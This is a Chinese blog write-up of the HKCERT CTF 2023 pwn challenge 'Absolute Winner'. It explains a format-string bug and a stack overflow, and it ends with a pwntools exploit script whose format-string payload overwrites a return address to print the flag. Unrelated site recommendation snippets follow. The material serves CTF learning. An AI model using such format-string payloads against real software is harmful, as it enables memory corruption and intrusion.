HKCERT CTF 2023-【Absolute Winner】

已于 2023-11-23 15:20:20 修改
阅读量92 收藏
点赞数
分类专栏: HKCERT CTF 文章标签: 学习
于 2023-11-13 23:47:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/llovewuzhengzi/article/details/134375800
版权

文章目录

前言

感觉这题在我的认知里,算是比较炸裂的。(本人较菜)

IDA

首先感觉IDA有点像陀shit了
strcpy汇编压根没有。。。。凭空逆了个strcpy函数处理,但汇编没问题。
You are cheating这个字符串和Bye这个字符串被放进栈中了,是直接写入的,全局变量没有这两个字符串。(怪不得搜字符串没搜到)
在这里插入图片描述
在这里插入图片描述

movabsq

movabsq是新增的指令。用来将一个64位的值直接存到一个64位寄存器中。

ja

JA(jump above)大于则转移到目标指令执行。 它是通过判断两个无符号数之间的大小关系,大于则转移

pretty_alert

这鸟函数里面用到了printf函数,有个printf函数第一个参数为pretty_alert的第一个参数。可以利用格式化字符串漏洞解决。(可以根据输出和动态调试发现)

scanf(“%s”,s)

一个明显的溢出。。。

开撸

保护全开(国外比赛的常规操作)
在这里插入图片描述
正常逻辑绕不过exit,只能printf格式化,但只能printf一次就得exit了,得绕过exit才行, pretty_alert和exit(0)相邻,为何不printf任意写改变pretty_alert的返回地址呢

随机化

在这里插入图片描述
八个字节改变,但最低四位总是不变

思路

可溢出修改后面的变量的值
发现可利用的rbp链,然后两次套娃即可
第一次套娃修改栈上某个位置的值为返回地址的地址
第二次套娃修改该返回地址位置的具体内容为printfflag的那个函数

不过这里需要注意的是一次printf中的第一次修改内容第二次修改时可能没来得及更新,所以

exp

from pwn import *

while True:
    try: 
        r=process("./chall")
        #gdb.attach(r,"b main")
        #r = remote('chal.hkcert23.pwnable.hk', 28246)
        #r.clean()
        
        r.sendline(b'Y\x00'.ljust(0x2b, b'A') + b'%c%c%c%c%c%c%c%c%c%c%46c%8$hhn%119c%22$hhn')
        r.sendline(b'1')
        r.sendline(b'1')
        r.recvuntil(b'The flag is ')
        r.interactive()
        break
    except KeyboardInterrupt:
        break
    except EOFError:
        r.close()
看星猩的柴狗
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFSHOW大赛原题篇(web711-web725)
羽的博客
02-27 4025
文章目录web711web712web713web782web785web786web787web788web789 web711 扫描目录发现存在robots.txt,提示static/secretkey.txt 访问得到一串字符串ctfshow_love_you 然后进入正常的页面,有个登录和注册,随便注册个用户并且登录后,发现存在文件上传点。 但是上传php后缀的文件不解析,应该不是php写的了。 看下session,应该是一个jwt加密的。那就好说了,伪造一个admin用户,而且加密的秘钥应该就是刚
信息安全站点收集
Youngs-RSR技术专栏
03-05 2964
转载来自:http://www.topdubhe.com/article-detials/4 国内 博客 名称 链接 RSS源 Hcamael https://0x48.pw/ https://0x48.pw/rss.xml Evi1cg https://evi1cg.me/ https://evi1cg.me/feed gracecode...
Linux服务器中Ebury Trojan病毒记
章郎虫的专栏
04-04 494
查看原文:http://www.sijitao.net/1681.html 上月,博主租用的vps主机商发给我一封邮件,内容大致说我的服务器中了Ebury Trojan病毒。这个可以说是我使用linux来第一次碰到中毒。主机商给的建议是备份数据,然后重装系统。邮件正文如下: Hostigation received third party information that...
2024Datawhale AI夏令营---基于术语词典干预的机器翻译挑战赛--学习笔记
weixin_61573157的博客
07-15 1046
机器翻译(Machine Translation,简称MT)是自然语言处理领域的一个重要分支,其目标是将一种语言的文本自动转换为另一种语言的文本。机器翻译的发展可以追溯到20世纪50年代,经历了从基于规则的方法、统计方法到深度学习方法的演变过程。当前,机器翻译正朝着更加智能化和个性化方向发展。一方面,结合上下文理解、情感分析等技术,提高翻译的准确性和自然度;另一方面,通过用户反馈和个性化学习,提供更加符合用户需求的翻译服务。同时,跨语言信息检索、多模态翻译等新兴领域也正在成为研究热点。
昇思25天学习打卡营第14天|LLM-文本解码原理--以MindNLP为例
最新发布
wwt72的博客
07-17 482
限制输出序列的最大长度为50个token。top-p=0.95,top-p采样表示在每一步生成token时,只从概率分布中累计概率达到95%的token中进行采样,有助于保持生成文本的流畅性和质量,同时允许一些低概率的token被选中,从而增加多样性。表示禁用了top-k采样,因为在top-k采样中,通常是从概率最高的k个token中随机选择一个token作为下一个输出,而这里设置为0表示不限制token的选择,实际上这将等同于使用 softmax 概率分布直接进行采样。这有助于提高生成文本的多样性。
探索Perl语言:入门学习与实战指南
洛秋的博客
07-15 984
Perl(Practical Extraction and Report Language)由Larry Wall于1987年创建,旨在帮助系统管理员简化日常任务。高效灵活:Perl的语法灵活多样,支持多种编程风格(过程式、面向对象等)。强大的文本处理能力:内置强大的正则表达式支持,是处理文本数据的利器。丰富的模块库:通过CPAN(Comprehensive Perl Archive Network)可以方便地获取和使用各类模块。Perl广泛应用于系统管理、Web开发、网络编程、数据库操作等领域。
NumPy库学习之np.random.rand函数
qq_46396470的博客
07-15 291
是 NumPy 库中的一个函数,用于生成随机数。这些随机数是从均匀分布 [0, 1) 中抽取的,即每个数都在0到1之间,但不包括1。
钓鱼攻击 - 基础学习
Reset
07-16 634
钓鱼攻击是一种典型的欺诈式攻击手段,攻击者通过伪装成可以信任的角色,利用电子邮件或其他通信渠道向被攻击者发送植入了木马的文档或恶意链接,并诱骗被攻击者点击执行,从而实现对被攻击者计算机的远程控制或恶意程序感染。
python 语法学习 day 7
2303_79973545的博客
07-15 300
-----元组之间可以进行比较,比较的规则是逐个比较元组中的元素。首先比较第一个元素,如果相等,则比较第二个元素,以此类推。如果所有元素都相等,那么元组相等;否则,比较的结果取决于第一个不相等元素的比较结果。题意:统计单词的种类以及数量(忽略大小写),最终以降序输出(出现次数相同的单词根据单词的大小升序输出)-------掌握如何将一个英语句子中的单词拆出来,并且去掉标点符号。EOF,输入后产生异常-->>捕获异常,结束输入。第一次提交的答案是:先把所有输入值放在列表里面。------字典排序。
昇思MindSpore 25天学习打卡营|day20
weixin_42036358的博客
07-13 731
生成式对抗网络(Generative Adversarial Networks,GAN)是一种生成式机器学习模型,是近年来复杂分布上无监督学习最具前景的方法之一。最初,GAN由Ian J. Goodfellow于2014年发明,并在论文生成器的任务是生成看起来像训练图像的“假”图像;判别器需要判断从生成器输出的图像是真实的训练图像还是虚假的图像。GAN通过设计生成模型和判别模型这两个模块,使其互相博弈学习产生了相当好的输出。GAN模型的核心在于提出了通过对抗过程来估计生成模型这一全新框架。
Cadence23学习笔记(三)
zjb6668的博客
07-15 343
焊接FPC的时候先上锡,焊台加热后再图上焊油,再放置元器件,再加热:万用表测电流只需要把表笔接到电流的孔位即可测量电流,不需要接再串联一个负载:有些线性电源两个通道可以串联,并联起来使用;
WPF学习(7) --MVVM模式
Fourglsl的博客
07-15 277
WPF学习(7) --MVVM模式
node.js的安装及学习(node/nvm/npm的区别)
Future_yzx的博客
07-14 448
node.js 一种Javascript编程语言的运行环境,能够使得javascript能够脱离浏览器运行。以前js只能在浏览器(也就是客户端)上运行,node.js将浏览器中的javascript运行环境进行封装的,使得该语言也可以在服务端运行。node.js=Google的V8引擎+内置基本模块(大多用JavaScript编写),类似JRE=JVM+java标准库node.js诞生之前,JavaScript只能运行于浏览器,现在也可以在服务器端运行于node.js;
Games101学习笔记 Lecture 20: Color and Perception
weixin_70073176的博客
07-17 676
Pθϕ)λPθϕλ)PθϕλtVx​Vy​Vz​。
base SAS programming学习笔记12(do loop)
ddjdd1234的博客
07-12 300
当使用point来指定行数读取的时候,需要使用stop避免结束读入数据的指针而引起连续读入该行数据,由于STOP会停止执行DATA步则不会将PDV的数据输出至输出数据集,因此需要加上OUTPUT来输出数据,将OUTPUT放入循环中则每次循环的数据都输出,如果放至循环外则只有最后一行数据输出。在上述程序中earned由于链接的是“+”,因此值都是保留到下一行,到第12月份仍然在执行循环,该循环完毕后month增至13,此时终止循环,因此输出的month=13;所以do until循环至少循环一次;
Cadence23学习笔记(二)
zjb6668的博客
07-14 222
2024/07/14,今天是个值得纪念的日子!发现一个好用到流泪的软件:电子精灵!只需要将搜索到的器件点击 摆放到orcad里面,点击右侧下载对应的封装就可以了!亲测:需要画完原理图,并且DRC通过之后才可以!
昇思25天学习打卡营第13天|CycleGAN 图像风格迁移互换全流程解析
chinayun_6401的博客
07-16 871
通过 create_dict_iterator 函数将数据转换成字典迭代器,然后使用 matplotlib 模块可视化部分训练数据。从 dataset 中读取前 5 组图像数据,对其进行处理,并以特定的布局在一个图形中展示这些图像。
Android Framework学习笔记(4)----Zygote进程
breakloop
07-17 249
Init进程启动后,会加载并执行init.rc文件。该.rc文件中中,就包含启动Zygote进程的Action。细节详见“RC文件解析”章节。
昇思25天学习打卡营第25天 | RNN实现情感分类
hailiu的专栏
07-14 197
例如,对于一个电影评论“这部电影太棒了,我非常喜欢”,RNN 可以逐步处理每个单词,捕捉到“太棒了”“非常喜欢”等积极词汇的信息,并综合整个序列的上下文来判断其情感为积极。另一个例子是“这个产品真糟糕,完全不满意”,RNN 能够理解“糟糕”“不满意”等消极词汇以及它们在上下文中的含义,从而将其分类为消极情感。- 将 RNN 输出的表示传递给全连接层,再通过激活函数(如 Softmax)进行分类,得到情感类别(如积极、消极)的概率分布。- 通过反向传播算法更新模型的参数,以优化模型的性能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

看星猩的柴狗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值